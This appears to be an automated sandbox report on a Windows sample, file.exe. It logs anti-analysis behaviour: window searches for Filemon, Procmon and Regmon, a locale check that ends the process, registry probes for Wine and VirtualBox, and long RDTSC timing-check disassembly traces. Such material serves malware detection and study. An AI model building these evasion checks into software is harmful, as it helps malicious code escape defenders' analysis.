                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BE9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36466
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBD96A second address: EBD96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBD96E second address: EBD972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045E38 second address: 1045E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D331D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045E54 second address: 1045E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045E5A second address: 1045E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B51 second address: 1036B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0641384216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B5B second address: 1036B65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0640D331C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B65 second address: 1036B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044EF8 second address: 1044F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0640D331C6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640D331CAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047C67 second address: 1047C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0641384216h 0x00000009 jno 00007F0641384216h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F0641384221h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D2383h], esi 0x00000021 push ABF0C980h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047C9E second address: 1047CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047CA2 second address: 1047CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DB9 second address: 1047DC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640D331C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DC3 second address: 1047E1C instructions: 0x00000000 rdtsc 0x00000002 je 00007F0641384218h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0641384216h 0x00000015 popad 0x00000016 pop eax 0x00000017 nop 0x00000018 mov dx, cx 0x0000001b push 00000000h 0x0000001d movsx edi, ax 0x00000020 call 00007F0641384219h 0x00000025 push ebx 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 jmp 00007F0641384221h 0x0000002e popad 0x0000002f pop ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0641384223h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047E1C second address: 1047E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D331D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047E37 second address: 1047E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047E3B second address: 1047E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F0640D82076h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jg 00007F0640D8207Bh 0x00000018 jmp 00007F0640D82075h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047E82 second address: 1047EF2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F0640516B3Fh 0x00000010 pop edi 0x00000011 popad 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F0640516B38h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D3656h] 0x00000033 push 00000003h 0x00000035 mov si, 4A40h 0x00000039 mov si, ax 0x0000003c push 00000000h 0x0000003e push 00000003h 0x00000040 add esi, 1C52E026h 0x00000046 cld 0x00000047 call 00007F0640516B39h 0x0000004c jnp 00007F0640516B44h 0x00000052 push eax 0x00000053 push edx 0x00000054 jl 00007F0640516B36h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047EF2 second address: 1047F34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F0640D8206Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 jmp 00007F0640D8206Dh 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0640D82076h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047F34 second address: 1047F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048048 second address: 10480C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0640D8206Ch 0x0000000c jnp 00007F0640D82066h 0x00000012 popad 0x00000013 add dword ptr [esp], 78E74B70h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F0640D82068h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000003h 0x00000036 push edx 0x00000037 movsx edx, cx 0x0000003a pop edi 0x0000003b sbb esi, 3A2E9554h 0x00000041 push 00000000h 0x00000043 or edx, 37A5F4A2h 0x00000049 push 00000003h 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007F0640D82068h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Ah 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 push 73C18D0Dh 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d pushad 0x0000006e popad 0x0000006f pop ebx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040B85 second address: 1040B8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067809 second address: 106780F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106780F second address: 1067834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Bh 0x00000009 jmp 00007F0640516B46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067BB0 second address: 1067BC6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640D82066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F0640D82066h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067BC6 second address: 1067BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067D2A second address: 1067D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067D2E second address: 1067D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067D32 second address: 1067D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0640D8206Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067D47 second address: 1067D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068433 second address: 1068440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068440 second address: 1068444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068444 second address: 106844E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10685DB second address: 10685E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10685E1 second address: 1068614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640D82077h 0x00000009 jmp 00007F0640D82078h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068614 second address: 106861D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CB20 second address: 105CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CB24 second address: 105CB47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0640516B3Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FD1 second address: 1069008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82076h 0x00000009 jmp 00007F0640D82074h 0x0000000e popad 0x0000000f jng 00007F0640D8206Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069008 second address: 1069012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069012 second address: 1069016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069016 second address: 1069035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0640516B47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069035 second address: 106904F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F0640D82066h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106904F second address: 1069053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C48A second address: 106C494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0640D82066h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C494 second address: 106C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CACE second address: 106CB36 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F0640D82077h 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007F0640D82070h 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jne 00007F0640D8207Ch 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BA1C second address: 106BA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BA20 second address: 106BA2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0640D8206Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076B3B second address: 1076B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076B40 second address: 1076B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F0640D82066h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076B4C second address: 1076B52 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076DD3 second address: 1076DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076DDB second address: 1076DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076F1B second address: 1076F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076F1F second address: 1076F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076F30 second address: 1076F39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079609 second address: 1079620 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640516B3Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A4A6 second address: 107A4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107AC45 second address: 107AC4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6F5 second address: 107B6FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B512 second address: 107B536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F0640516B48h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C710 second address: 107C7BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0640D82068h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F0640D82077h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0640D82068h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e add dword ptr [ebp+12463679h], ebx 0x00000034 push 00000000h 0x00000036 jmp 00007F0640D82074h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F0640D82068h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 call 00007F0640D8206Ah 0x0000005c cld 0x0000005d pop esi 0x0000005e xchg eax, ebx 0x0000005f push edi 0x00000060 jne 00007F0640D8206Ch 0x00000066 pop edi 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DB0F second address: 107DB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1245B328h], eax 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D19B4h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F0640516B38h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov si, EC27h 0x0000003a xchg eax, ebx 0x0000003b jns 00007F0640516B3Eh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F0640516B3Bh 0x0000004a jmp 00007F0640516B3Ah 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DB86 second address: 107DB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DB8C second address: 107DB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4E1 second address: 107E4E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4E5 second address: 107E504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0640516B3Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082517 second address: 108258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F0640D8206Dh 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D368Eh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F0640D82068h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F0640D82068h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b clc 0x0000004c sbb bx, 2F01h 0x00000051 push eax 0x00000052 pushad 0x00000053 push esi 0x00000054 jmp 00007F0640D82070h 0x00000059 pop esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108258C second address: 1082590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083427 second address: 108343D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F0640D82066h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108343D second address: 1083447 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083447 second address: 10834A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, 3B4C8ED7h 0x00000010 jp 00007F0640D8206Ch 0x00000016 add ebx, 4803C7F6h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F0640D82068h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+1246F92Bh], eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007F0640D8206Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10834A4 second address: 10834A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108668B second address: 108668F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108668F second address: 1086695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
